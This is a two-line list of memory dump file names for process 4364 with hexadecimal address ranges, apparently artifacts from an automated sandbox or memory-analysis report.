memory/4364-55-0x00000000251A0000-0x0000000025232000-memory.dmp

memory/4364-56-0x0000000025140000-0x000000002514A000-memory.dmp